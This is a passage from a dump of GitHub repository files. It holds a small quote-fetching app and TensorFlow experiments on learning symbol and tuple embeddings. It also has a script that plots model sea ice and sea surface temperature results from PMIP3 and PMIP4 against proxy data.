logger.debug(\"config file paths: {}\".format(config_file_paths))\n\n return sorted(config_file_paths)[0].path\n\n\nclass WeightedPath(object):\n def __init__(self, path, weight):\n self.path = path\n self.weight = weight\n\n def __repr__(self):\n return '{}: {} {}'.format(self.__class__.__name__,\n self.path,\n self.weight)\n\n def __cmp__(self, other):\n if hasattr(other, 'weight'):\n return self.weight.__cmp__(other.weight)\n"
}
] | 9 |
aanwar5/BreakingBadQuoteFunc | https://github.com/aanwar5/BreakingBadQuoteFunc | c23ad45d5dd1173b219e1127a11edc1a9edbf6c8 | fe40ce6821d41063bf28168cee0493554cc5c4fd | 25cf2d455d2a394547be1c62cd44308faf33bb8e | refs/heads/master | 2023-06-01T12:50:47.895234 | 2021-06-29T10:03:47 | 2021-06-29T10:03:47 | 380,433,631 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7032967209815979,
"alphanum_fraction": 0.7032967209815979,
"avg_line_length": 22,
"blob_id": "d82566045523de862c1627f01ccd578abe145b29",
"content_id": "7689c07b4b58801c5a0fbe85eb99eda6562a5812",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 91,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 4,
"path": "/tests/test_lib.py",
"repo_name": "aanwar5/BreakingBadQuoteFunc",
"src_encoding": "UTF-8",
"text": "from bbquote.lib import get_quote\n\ndef test_getquote():\n assert type(get_quote()) == str"
},
{
"alpha_fraction": 0.7099999785423279,
"alphanum_fraction": 0.7099999785423279,
"avg_line_length": 10.11111068725586,
"blob_id": "bae471130ebbb735b1bda086ea4cd462136b8410",
"content_id": "392dee21a1d5da46d483f81d8870501490652074",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 100,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 9,
"path": "/app.py",
"repo_name": "aanwar5/BreakingBadQuoteFunc",
"src_encoding": "UTF-8",
"text": "import streamlit as st\n\nfrom bbquote.lib import get_quote\n\nquote = get_quote()\n\n'Hello'\n\nf\"{quote}\"\n"
}
] | 2 |
akamaus/emlambda | https://github.com/akamaus/emlambda | dd46c06f4511aa84bb3951460700e6420815bd20 | 7af36f9dee3d3032bf615bff37fa64b9427f5f54 | dab84853f25cc95c22c7ca9e518561f4624bdc50 | refs/heads/master | 2021-01-13T03:46:36.047823 | 2017-01-09T06:58:18 | 2017-01-09T06:58:18 | 77,207,830 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5789567232131958,
"alphanum_fraction": 0.5842976570129395,
"avg_line_length": 33.460121154785156,
"blob_id": "ab5767f1f94f99c2ecf5fc69a875bac0ee6934e3",
"content_id": "59eea37af591678398b783b0be2228f212d45dac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5617,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 163,
"path": "/model.py",
"repo_name": "akamaus/emlambda",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Linear:\n def __init__(self, inp_size, out_size, name = None):\n self.weights = tf.Variable(tf.truncated_normal([inp_size, out_size], stddev=1), name=name + \"_weights\")\n tf.summary.histogram(name + '_weights', self.weights)\n\n def apply(self, inp):\n return tf.matmul(inp, self.weights)\n\n def parameters(self):\n return {'weights': self.weights}\n\nclass Affine:\n def __init__(self, inp_size, out_size, name=None):\n self.weights = tf.Variable(tf.truncated_normal([inp_size, out_size], stddev=1), name=name + \"_weights\")\n self.biases = tf.Variable(tf.truncated_normal([out_size], stddev=1), name=name + \"_biases\")\n tf.summary.histogram(name + '_weights', self.weights)\n tf.summary.histogram(name + '_biases', self.biases)\n\n def apply(self, inp):\n return tf.matmul(inp, self.weights) + self.biases\n\n def parameters(self):\n return {'weights': self.weights, 'biases': self.biases}\n\n\nclass Model:\n \"\"\"A model for learning symbol-hierarchy embedding.\n Symbols initially represented as one-hot rows (of size sym_width)\n which got embedded into Code vector-space (rows of size code_width)\"\"\"\n def __init__(self, num_symbols, code_width):\n self.code_width = code_width\n self.num_syms = num_symbols\n self.sym_width = num_symbols\n # symbol tables\n self.symbols = [i for i in range(1, num_symbols + 1)]\n self.sym_dict = {}\n\n for i, c in enumerate(self.symbols):\n self.sym_dict[c] = np.zeros(self.sym_width)\n self.sym_dict[c][i] = 1\n\n # Null Symbol\n self.EmptyCode = Model.matrix([code_width], 'EmptyCode')\n tf.summary.histogram(\"EmptyCode_weights\", self.EmptyCode)\n\n # embeds symbol\n self.Coder = Linear(num_symbols, code_width, 'Coder')\n # merges two embeddings to produce a tuple\n self.Tuple = Affine(code_width * 2, code_width, 'Tuple')\n # deconstruct tuple\n self.UnTuple = Affine(code_width, code_width*2, 'UnTuple')\n # detects if its a symbol or a Tuple\n self.TypeDetector = Affine(code_width, 2, 'TypeDetector')\n # morphisms\n self.LR = Linear(code_width, code_width, 'LR')\n self.RL = Linear(code_width, code_width, 'RL')\n\n all_params = []\n for m in [self.Coder, self.Tuple, self.UnTuple, self.TypeDetector, self.LR, self.RL]:\n all_params += m.parameters().items()\n self.net_saver = tf.train.Saver(dict(all_params))\n\n plt.ion()\n self.fig = plt.figure()\n self.ax = self.fig.add_subplot(1, 1, 1)\n self.first_draw = True\n\n def one_hot(self, symbols):\n \"\"\"one-hot encoding of symbol or list of symbols\"\"\"\n if type(symbols) is int:\n res = self.sym_dict[symbols]\n elif type(symbols) is list:\n res = map(lambda s: self.sym_dict[s], symbols)\n else: raise Exception(\"Unknown type passed to model.one_hot\" + str(type(symbols)))\n return res\n\n def embed(self, one_hot):\n \"\"\"Embeds a symbol (or list of symbols) into vector-space\"\"\"\n return self.Coder.apply(one_hot)\n\n def type_detector(self, code):\n \"\"\"Returns logits corresponding to code belong to different classes\"\"\"\n return self.TypeDetector.apply(code)\n\n def empty_code(self):\n \"\"\"Returns a code for empty symbol\"\"\"\n return self.EmptyCode\n\n def tuple(self, c1, c2):\n \"\"\"Makes a tuple of two args\"\"\"\n return self.Tuple.apply(tf.concat(1, [c1, c2]))\n\n def untuple(self, c):\n \"\"\"Splits tuple code into two subcomponents\"\"\"\n res = self.UnTuple.apply(c)\n return tf.split(1, 2, res)\n\n def left_to_right(self, c):\n return self.LR.apply(c)\n\n def right_to_left(self, c):\n return self.RL.apply(c)\n\n def draw_matrices(self, vis_data):\n xs = vis_data['coder']['weights'][:, 0]\n ys = vis_data['coder']['weights'][:, 1]\n\n rev_xs = vis_data['rev_seqs'][0][:, 0]\n rev_ys = vis_data['rev_seqs'][0][:, 1]\n\n tup_xs = vis_data['tuple_codes'][:, 0]\n tup_ys = vis_data['tuple_codes'][:, 1]\n\n s = 20\n if self.first_draw:\n self.seqs_plot, self.rev_plot, self.tuple_plot = self.ax.plot(xs, ys, '+', rev_xs, rev_ys, 'go', tup_xs, tup_ys, 'rp')\n self.ax.set_xlim(-s, s)\n self.ax.set_ylim(-s, s)\n self.first_draw = False\n# self.fig.show()\n else:\n self.seqs_plot.set_xdata(xs)\n self.seqs_plot.set_ydata(ys)\n self.rev_plot.set_xdata(rev_xs)\n self.rev_plot.set_ydata(rev_ys)\n self.tuple_plot.set_xdata(tup_xs)\n self.tuple_plot.set_ydata(tup_ys)\n\n self.ax.relim()\n self.ax.autoscale_view()\n self.fig.canvas.draw()\n\n def print_matrices(self, sess):\n print('EmptyCode')\n print(sess.run(self.EmptyCode))\n\n print('Coder:')\n print(sess.run(self.Coder.parameters()))\n\n print('Tuple:')\n print(sess.run(self.Tuple.parameters()))\n\n print('UnTuple:')\n print(sess.run(self.UnTuple.parameters()))\n\n print('LR')\n print(sess.run(self.LR.parameters()))\n\n print('RL')\n print(sess.run(self.RL.parameters()))\n\n @staticmethod\n def matrix(shape, name = None):\n return tf.Variable(tf.truncated_normal(shape, stddev=1), name=name)\n\n def affine(inp, out, name = None):\n\n return tf.Variable()\n"
},
{
"alpha_fraction": 0.5929344296455383,
"alphanum_fraction": 0.6037521958351135,
"avg_line_length": 38.69969940185547,
"blob_id": "d15b3f27614380b05dfac483d2bb877dd8aafa8a",
"content_id": "b82abfdbe59fa35872fbfc9b5e7ac098dd7e53fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13219,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 333,
"path": "/embedding.py",
"repo_name": "akamaus/emlambda",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\nfrom time import localtime, strftime\n\nimport os\nimport tensorflow as tf\nimport random\n\nfrom model import Model\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_integer('steps', 100000, 'Number of steps until stop')\ntf.app.flags.DEFINE_integer('batch_size', 50, 'Number of examples in mini-batch')\n\ntf.app.flags.DEFINE_integer('num_symbols', 8, 'Atomic symbols number')\ntf.app.flags.DEFINE_integer('code_width', 2, 'Number of embedding dimensions')\ntf.app.flags.DEFINE_integer('seq_len', 2, 'Maximal length of symbol sequences to learn')\n\n# Model\nmodel = Model(num_symbols=FLAGS.num_symbols, code_width=FLAGS.code_width)\n\n# some constants and initialization\nf32 = tf.float32\npair_sz = 2\neps = 1e-6\nexperiment = \"exp-voc\" + str(FLAGS.num_symbols) + \"-code\" + str(FLAGS.code_width) + \"-seq\" + str(FLAGS.seq_len)\n\n\ndef ensure_dir(d):\n \"\"\"Creates dir if it doesn't exist\"\"\"\n if not os.path.exists(d):\n os.makedirs(d)\n\n\ndef sym_list(list_len, different=False):\n \"\"\"Generates a list of identifiers (to be used, for example to combine into single code)\"\"\"\n if different:\n lst = random.sample(model.symbols, list_len)\n else:\n lst = [random.choice(model.symbols) for x in range(list_len)]\n return model.one_hot(lst)\n\n\ndef sym_list_batch(list_len, batch, different=False):\n \"\"\"Generates a batch of identifier sequence\"\"\"\n batch = [list(sym_list(list_len, different)) for x in range(batch)]\n return batch\n\n\ndef seq_coder_l(symbol_codes):\n \"\"\"Takes list of codes representing symbol-code sequence\n folds it into a single code. Returns summary code and list of accumulated results\"\"\"\n tuples = []\n with tf.name_scope('seq_coder_l'):\n b = tf.shape(symbol_codes[0])[0]\n c = tf.tile(tf.expand_dims(model.empty_code(), axis=0), [b, 1])\n for ci in symbol_codes:\n tuples.append(c)\n c = model.tuple(c,ci)\n return c, tuples\n\n\ndef seq_decoder_l(seq_code, seq_length):\n \"\"\"Takes a code representing symbol sequence and unfolds it\"\"\"\n tuples = []\n symbols = []\n with tf.name_scope('seq_decoder_l'):\n for i in range(seq_length):\n seq_code,symbol = model.untuple(seq_code)\n tuples.append(seq_code)\n symbols.append(symbol)\n tuples.reverse()\n symbols.reverse()\n return symbols, tuples\n\n\ndef seq_coder_r(symbol_codes):\n \"\"\"Foldr. Returns summary code and list of accumulated results\"\"\"\n tuples = []\n with tf.name_scope('seq_coder_r'):\n b = tf.shape(symbol_codes[0])[0]\n c = tf.tile(tf.expand_dims(model.empty_code(), axis=0), [b, 1])\n cs = list(symbol_codes)\n cs.reverse()\n for ci in cs:\n tuples.append(c)\n c = model.tuple(ci,c)\n return c, tuples\n\n\ndef seq_decoder_r(seq_code, seq_length):\n \"\"\"Unflodr. Takes a code representing symbol sequence and unfolds it\"\"\"\n tuples = []\n symbols = []\n with tf.name_scope('seq_decoder_r'):\n for i in range(seq_length):\n symbol, seq_code = model.untuple(seq_code)\n tuples.append(seq_code)\n symbols.append(symbol)\n tuples.reverse()\n return symbols, tuples\n\n\n# Learners\ndef learn_coder(p_diff_ids):\n \"\"\"Subgraph for learning coder\"\"\"\n with tf.name_scope('coder_learner') as scope:\n diff_codes = tf.reshape(model.embed(one_hot=tf.reshape(p_diff_ids, [-1, model.sym_width])),\n [-1, pair_sz, model.code_width])\n diff_pairs = tf.transpose(diff_codes, perm=[1, 0, 2])\n diff_cs = tf.unpack(diff_pairs)\n code_dist = tf.reduce_sum(tf.squared_difference(diff_cs[0], diff_cs[1]), 1)\n code_loss = tf.reduce_mean(1 / code_dist)\n tf.summary.scalar('code_loss', code_loss)\n code_min = tf.reduce_min(code_dist)\n tf.summary.scalar('code_min', code_min)\n return code_loss, code_min\n\n\ndef learn_tuple(seqs):\n \"\"\"Subgraph for learning tuple/untuple modules\"\"\"\n with tf.name_scope('learn_tuple'):\n seq_list = tf.unpack(seqs)\n tup_codes = model.tuple(seq_list[0], seq_list[1])\n rev_seqs = model.untuple(tup_codes)\n tuple_sqr_dist = tf.squared_difference(seqs, rev_seqs)\n tuple_loss = tf.reduce_mean(tuple_sqr_dist)\n tf.summary.scalar('tuple_loss', tuple_loss)\n tuple_max = tf.sqrt(tf.reduce_max(tuple_sqr_dist))\n tf.summary.scalar('tuple_max', tuple_max)\n return tuple_loss, tuple_max, tup_codes, rev_seqs\n\n\ndef learn_fold(seqs, assoc):\n \"\"\"Subgraph for learning folds consisting of repeating tuple applications (left or right associativity)\"\"\"\n with tf.name_scope('learn_fold') as scope:\n if assoc == 'Left':\n params = {'coder': seq_coder_l,\n 'decoder': seq_decoder_l,\n 'suffix': '_l'}\n elif assoc == 'Right':\n params = {'coder': seq_coder_r,\n 'decoder': seq_decoder_r,\n 'suffix': '_r'}\n else:\n raise Exception('unknown dir')\n\n seq_list = tf.unpack(seqs)\n code, tup_codes = params['coder'](seq_list)\n rev_seqs, rev_tup_codes = params['decoder'](code, FLAGS.seq_len)\n seq_sqr_dist = tf.squared_difference(seqs, rev_seqs)\n tup_sqr_dist = tf.squared_difference(tup_codes, rev_tup_codes)\n seq_loss = tf.reduce_mean(seq_sqr_dist)\n tup_loss = tf.reduce_mean(tup_sqr_dist)\n tf.summary.scalar('seq_loss' + params['suffix'], seq_loss)\n tf.summary.scalar('tup_loss' + params['suffix'], tup_loss)\n tup_max = tf.sqrt(tf.reduce_max(tup_sqr_dist))\n seq_max = tf.sqrt(tf.reduce_max(seq_sqr_dist))\n tf.summary.scalar('seq_max' + params['suffix'], seq_max)\n tf.summary.scalar('tup_max' + params['suffix'], tup_max)\n return code, seq_max, tup_max, seq_loss, tup_loss, rev_seqs\n\n\ndef learn_morphisms(code_l, code_r):\n \"\"\"Subgraph for learning morphisms\"\"\"\n with tf.name_scope('learn_morphisms'):\n code_lr = model.left_to_right(code_l)\n code_rl = model.right_to_left(code_r)\n\n code_dist_lr_loss = tf.reduce_mean(tf.squared_difference(code_lr, code_r))\n code_dist_rl_loss = tf.reduce_mean(tf.squared_difference(code_rl, code_l))\n tf.summary.scalar('code_dist_lr', code_dist_lr_loss)\n tf.summary.scalar('code_dist_rl', code_dist_rl_loss)\n return code_dist_lr_loss, code_dist_rl_loss\n\n\ndef restoration_precision(seqs, rev_seqs, all_codes):\n \"\"\"Subgraph for restoration stats for symbols\"\"\"\n with tf.name_scope('restoration_stats'):\n def codes_to_ids(codes):\n codes_1 = tf.expand_dims(codes, 2)\n dists = tf.reduce_sum(tf.squared_difference(codes_1, all_codes), 3)\n ids = tf.arg_min(dists, 2)\n return ids\n\n orig_ids = codes_to_ids(seqs)\n rev_ids = codes_to_ids(rev_seqs)\n\n restorations = tf.equal(orig_ids, rev_ids)\n num_restored = tf.reduce_sum(tf.cast(restorations, dtype=tf.float32), 0)\n # stats[i] is number of sequences with i-th element restored\n elem_restoration_stats = tf.reduce_sum(tf.cast(restorations, dtype=tf.int32), 1)\n # hist[i] - is number of sequences with i properly restored elements\n num_proper_restorations_hist = tf.histogram_fixed_width(num_restored,\n [0.0, FLAGS.seq_len+1.0], FLAGS.seq_len+1, dtype=tf.int32)\n\n tf.summary.histogram('num_restored', num_restored)\n return elem_restoration_stats, num_proper_restorations_hist\n\n\ndef vis_tuple(seqs):\n \"\"\"Subgraph for visualizing tuples and restored symbols\"\"\"\n with tf.name_scope('vis_tuple'):\n seq_list = tf.unpack(seqs)\n tup_codes = model.tuple(seq_list[0], seq_list[1])\n rev_seqs = model.untuple(tup_codes)\n return tup_codes, rev_seqs\n\n\ndef learn_type_detector(codes, tuples):\n \"\"\"Subgraph for type detector learning\"\"\"\n code_labels = tf.tile(tf.constant([0], dtype=tf.int64), [tf.shape(codes)[0]])\n tuple_labels = tf.tile(tf.constant([1], dtype=tf.int64), [tf.shape(tuples)[0]])\n labels = tf.concat(0, [code_labels, tuple_labels])\n one_hot_labels = tf.one_hot(labels, 2)\n\n data = tf.concat(0, [codes, tuples])\n logits = model.type_detector(data)\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits, one_hot_labels))\n prec = tf.reduce_mean(tf.cast(tf.equal(tf.arg_max(logits, 1), labels), dtype=f32))\n return loss, prec\n\n\ndef do_train():\n print('vocabulary {}, code_width {}, sequence_len {}'.format(FLAGS.num_symbols, FLAGS.code_width, FLAGS.seq_len))\n\n ensure_dir('checkpoints')\n ensure_dir('logs')\n\n p_ids = tf.placeholder(f32, [None, FLAGS.seq_len, model.sym_width], name='ids') # Batch x Seq x SymWidth\n ids_2d = tf.reshape(p_ids, [-1, model.sym_width])\n sym_codes = tf.reshape(model.embed(ids_2d), [-1, FLAGS.seq_len, model.code_width]) # Batch x Seq x Code\n seqs = tf.transpose(sym_codes, perm=[1, 0, 2]) # Seq x Batch x Code\n\n # for coder\n p_diff_ids = tf.placeholder(f32, [None, pair_sz, model.sym_width], name='diff_ids')\n code_loss, code_min = learn_coder(p_diff_ids)\n\n # Tuple/Untuple\n tuple_loss, tuple_max, tuple_codes, rev_seqs = learn_tuple(seqs)\n\n # Folds\n code_l, seq_max_l, tup_max_l, seq_loss_l, tup_loss_l, rev_seqs_l = learn_fold(seqs, 'Left')\n code_r, seq_max_r, tup_max_r, seq_loss_r, tup_loss_r, _ = learn_fold(seqs, 'Right')\n\n # Left-to right morphism\n code_dist_lr_loss, code_dist_rl_loss = learn_morphisms(code_l, code_r)\n\n # restoration accuracy\n p_all_ids = tf.placeholder(f32, [model.sym_width, model.num_syms], name='all_ids')\n all_codes = model.embed(p_all_ids)\n\n elem_restoration_stats, num_proper_restorations_hist = restoration_precision(seqs, rev_seqs, all_codes) # rev_seqs_l for folds\n\n # Visualization\n nc = tf.shape(all_codes)[0]\n all_code_stacks_1 = tf.reshape(tf.tile(all_codes, [nc, 1]), [nc, nc, -1])\n all_code_stacks_2 = tf.transpose(all_code_stacks_1, perm=[1, 0, 2])\n all_code_pairs_1 = tf.reshape(all_code_stacks_1, [nc * nc, -1])\n all_code_pairs_2 = tf.reshape(all_code_stacks_2, [nc * nc, -1])\n all_code_pairs = tf.stack([all_code_pairs_1, all_code_pairs_2])\n all_tuples, all_rev_sym = vis_tuple(all_code_pairs)\n\n # Type Detector\n type_det_loss, type_det_prec = learn_type_detector(all_codes, all_tuples)\n\n # loss for folds\n # full_loss = seq_loss_l + tup_loss_l + seq_loss_r + tup_loss_r + code_loss + code_dist_lr_loss + code_dist_rl_loss #+ det_cross_ent\n # loss for tuple/untuple\n full_loss = tuple_loss + code_loss + type_det_loss\n step = tf.train.AdamOptimizer(0.01).minimize(full_loss)\n\n experiment_date = experiment + \"-\" + strftime(\"%Y-%m-%d-%H%M%S\", localtime())\n writer = tf.summary.FileWriter(\"logs/\" + experiment_date, flush_secs=5)\n summaries = tf.summary.merge_all()\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n writer.add_graph(sess.graph)\n k = None\n all_perfect = 0\n\n all_ids_v = list(model.one_hot(model.symbols))\n\n for i in range(FLAGS.steps):\n k = i\n ids_v = sym_list_batch(FLAGS.seq_len, FLAGS.batch_size, False)\n diff_ids_v = sym_list_batch(pair_sz, model.num_syms, True)\n\n # logs_ = ((seq_max_l, tup_max_l, code_min), (seq_max_r, tup_max_r),\n # (seq_loss_l, tup_loss_l, code_loss, code_dist_lr_loss, code_dist_rl_loss))\n\n logs_ = ((tuple_loss, tuple_max), (code_min,), (type_det_loss, type_det_prec))\n vis_data_ = {\"coder\": model.Coder.parameters(), \"tuple_codes\": all_tuples, \"rev_seqs\": all_rev_sym}\n\n _, bin_summary, logs, restoration_stats, vis_data = \\\n sess.run([step, summaries, logs_,\n (num_proper_restorations_hist, elem_restoration_stats),\n vis_data_], # (det_cs1_acc, det_tups_acc, det_cross_ent)\n feed_dict={\n p_ids: ids_v,\n p_diff_ids: diff_ids_v,\n p_all_ids: all_ids_v\n })\n tuple_logs, coder_logs, type_det_logs = logs\n\n if restoration_stats[0][FLAGS.seq_len] == FLAGS.batch_size:\n all_perfect += 1\n else:\n all_perfect = 0\n\n if tuple_logs[0] < eps and coder_logs[0] > 0.5 and type_det_logs[1] > 0.99 : # or all_perfect >= 10000:\n print(\"early stopping\")\n break\n\n if i % 100 == 0:\n writer.add_summary(bin_summary, i)\n print(i, list(restoration_stats[0]), list(restoration_stats[1]), logs)\n model.draw_matrices(vis_data)\n\n if i % 1000 == 0:\n model.net_saver.save(sess, \"checkpoints/\" + experiment_date, global_step=k)\n\n if i % 5000 == 0:\n model.print_matrices(sess)\n\n\ndo_train()\n#elif sys.argv[3] == 'test':\n# checkpoint = sys.argv[4]\n# do_test(checkpoint)\n\ntf.nn.conv1d()"
},
{
"alpha_fraction": 0.4897959232330322,
"alphanum_fraction": 0.5236151814460754,
"avg_line_length": 31.320755004882812,
"blob_id": "81ed1d2eadc5c343bf949646908cd4da39ea496f",
"content_id": "76aba0e0eaeffb2e057e75fb20b46cd33634e824",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1715,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 53,
"path": "/test.py",
"repo_name": "akamaus/emlambda",
"src_encoding": "UTF-8",
"text": "\nntop = 5\ntries = 10\ndef do_test(snapshot):\n p_all_ids = tf.placeholder(f32, [sym_width, num_syms])\n\n p_id1 = tf.placeholder(f32, [sym_width, 1])\n p_id2 = tf.placeholder(f32, [sym_width, 1])\n\n c1 = tf.matmul(Coder, p_id1)\n c2 = tf.matmul(Coder, p_id2)\n\n tup = tf.matmul(Tuple, tf.concat(0,[c1,c2]))\n\n c1_rev = tf.matmul(UnTuple1,tup)\n c2_rev = tf.matmul(UnTuple2,tup)\n\n all_cs = tf.matmul(Coder, p_all_ids)\n\n diff1 = tf.sqrt(tf.squared_difference(all_cs, c1_rev))\n values, entries = tf.nn.top_k(-diff1, ntop )\n\n with tf.Session() as sess:\n tf.initialize_all_variables().run()\n\n net_saver.restore(sess, snapshot)\n\n successes1 = 0\n confidence_neg = 0\n confidence_pos = 0\n for k in range(tries):\n pair = id_pairs(1, False)\n v_values, v_entries = sess.run([values, entries], feed_dict = {\n p_id1 : pair[0],\n p_id2 : pair[1],\n p_all_ids : np.transpose(list(sym_dict.values()))\n }\n )\n if np.argmax(pair[0]) == v_entries[0,0]:\n successes1 += 1\n confidence_pos += v_values[0,1] / v_values[0,0]\n else:\n confidence_neg += v_values[0,1] / v_values[0,0]\n\n for i in range(ntop):\n e = v_entries[0,i]\n v = -v_values[0,i]\n print('sym', np.argmax(pair[0]), 'restored', e, 'value', v)\n\n print('successes: ', successes1, 'of', tries)\n if successes1 > 0:\n print('confidence_pos', confidence_pos / successes1)\n if successes1 < tries:\n print('confidence_neg', confidence_neg / (tries - successes1))\n\n"
}
] | 3 |
RyanAGreen/PMIP_seaice | https://github.com/RyanAGreen/PMIP_seaice | b0a3aa5ad5cac68878eb948654df74d1cdd09549 | d89fa29e53fd72e553f5ee2b461225fb9ea4cbf6 | e0c1539b3bcee743b62010f41e5d6b9e1234ac6b | refs/heads/main | 2023-08-23T21:04:58.405480 | 2023-05-11T20:17:08 | 2023-05-11T20:17:08 | 416,446,753 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.652002215385437,
"alphanum_fraction": 0.7202432751655579,
"avg_line_length": 44.70758056640625,
"blob_id": "9851c272a92ce9726b873957123e1a5f308840c4",
"content_id": "e7bcc0345cd6e1b6da42924c48254cbb2e7eb459",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12669,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 277,
"path": "/Figure2.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy as sp\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\nimport xarray as xr\nimport matplotlib as mpl\n\n# most area to least area finished with MMM\n\n# PMIP3\n# CCSM4, FGOALS, MRI, MPI, MIROC, IPSL, GISS, CNRM (MMM is commented after because removed later MMM)\n\nseaiceedge_PMIP3 = [-55.5,-61.5,-62.5,-65,-66.5,-70,-65.5,-75.5] #,-62.5]\nSSTtest_PMIP3 = [-0.5208,1.998,2.885,2.692,2.911,2.884,3.708,5.582] #,2.95]\nseaicearea_PMIP3 = [ 27.46,13.62,12.54,5.187,3.530,2.414,2.391,.06047] #,9.34]\ncolorsPMIP3 = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\n\n# PMIP4\n#UoTCCSM4, CESM1.2, LOVECLIM, AWI, MPI, IPSL, MIROC (MMM is commented after because removed later MMM)\nseaiceedge_PMIP4 = [-53,-57.5,-59.5,-62,-65,-70,-75.5] #,-59]\nSSTtest_PMIP4 = [-1.017,0.161,2.218,0.957,2.451,3.404,5.583] #,1.774]\nseaicearea_PMIP4 = [ 33.15,23.75,17.55,14.73,5.18,2.46,0.36] #,19.08]\n# need to decide color for MMM\ncolorsPMIP4 = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\n\n\n# LOVECLIM\n# weakNA_AB (LOVE2), weak_AB (LOVE1) (MMM is commented after because removed later MMM)\nseaiceedge_LOVE = [-58.5, -59.5] #,-59]\nSSTtest_LOVE = [1.61,2.15] #, 1.875]\nseaicearea_LOVE = [20.27, 15.73] #, 18.47]\ncolorsLOVE = ['#F7DC6F','#F7DC6F']\n\n\n# proxy\nproxyseaicearea = [15.9]\nproxyseaiceedge = [-61]\nproxySST = [1.52]\ncolorsproxy=['white']\nfacecolorsproxy=['black']\n\n# total (excluding MMM and proxy)\n# PMIP3, PMIP4, LOVECLIM PMIP3\n#seaiceedge_total = np.array([-55.5,-61.5,-62.5,-65,-66.5,-70,-65.5,-75.5,-53,-57.5,-59.5,-62,-65,-70,-75.5])\nseaiceedge_total = seaiceedge_PMIP3 + seaiceedge_PMIP4 + seaiceedge_LOVE\n#SSTtest_total = [-0.5208,1.998,2.885,2.692,2.911,2.884,3.708,5.582,-1.017,0.161,2.218,0.957,2.451,3.404,5.583]\nSSTtest_total = SSTtest_PMIP3 + SSTtest_PMIP4 + SSTtest_LOVE\n#seaicearea_total = [27.46,13.62,12.54,5.187,3.530,2.414,2.391,.06047,33.15,23.75,17.55,14.73,5.18,2.46,0.36]\nseaicearea_total = seaicearea_PMIP3 + seaicearea_PMIP4 + seaicearea_LOVE\n\n# linear fit for sea ice edge vs SST\nfit = np.polyfit(SSTtest_total,seaiceedge_total,1)\nang_coeff = fit[0]\nintercept = fit[1]\nfit_sie = ang_coeff*np.asarray(SSTtest_total) + intercept\n\n# linear fit for sea ice area vs SST\nfit = np.polyfit(SSTtest_total,seaicearea_total,1)\nang_coeff = fit[0]\nintercept = fit[1]\nfit_sia = ang_coeff*np.asarray(SSTtest_total) + intercept\n\n# proxy data\nproxy = pd.read_excel('~/Desktop/UNSW/Table_Recap_LGM_Final.xlsx',engine=\"openpyxl\",sheet_name='Data')\ndata = proxy[['Latitude', 'LGM']]\ndata = data[3:]\ndata = data.dropna()\ndata = data.reset_index(drop=True)\n\nMIROC4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/MIROCsstzonallyavg.nc')\nIPSL4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/IPSLsstzonallyavg.nc')\nMPI4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/MPIsstzonallyavg.nc')\nAWI4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/AWIsstzonallyavg.nc')\nLOVE4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVEsstzonallyavg.nc')\nCESM4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/CESMsstzonallyavg.nc')\nCCSM44 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/CCSM4sstzonallyavg.nc')\nPMIP3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/TOSSummerAllModelsnew.nc')\nLOVEsens = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVE_summer_zonnalyaveSST.nc')\n\n# PMIP3\nCNRM3 = PMIP3.TOS2 - 273.15\nGISS3 = PMIP3.TOS4 - 273.15\nIPSL3 = PMIP3.TOS5 - 273.15\nMIROC3 = PMIP3.TOS6 - 273.15\nMPI3 = PMIP3.TOS7 - 273.15\nMRI3 = PMIP3.TOS8\nFGOALS3 = PMIP3.TOS3 - 273.15\nCCSM43 = PMIP3.TOS1 - 273.15\nPMIP3_zonal = [CCSM43,FGOALS3,MRI3,MPI3,MIROC3,IPSL3,GISS3,CNRM3]\nPMIP3_zonal_colors = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\n\n# PMIP4\nMIROC4 = MIROC4.TOS\nIPSL4 = IPSL4.TOS\nMPI4 = MPI4.TOS\nAWI4 = AWI4.TOS\nLOVE4 = LOVE4.TOS\nCESM4 = CESM4.TOS\nCCSM44 = CCSM44.TOS\nPMIP4_zonal = [CCSM44,CESM4,LOVE4,AWI4,MPI4,IPSL4,MIROC4]\nPMIP4_zonal_colors = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\n\n# LOVECLIM\nweakNA = 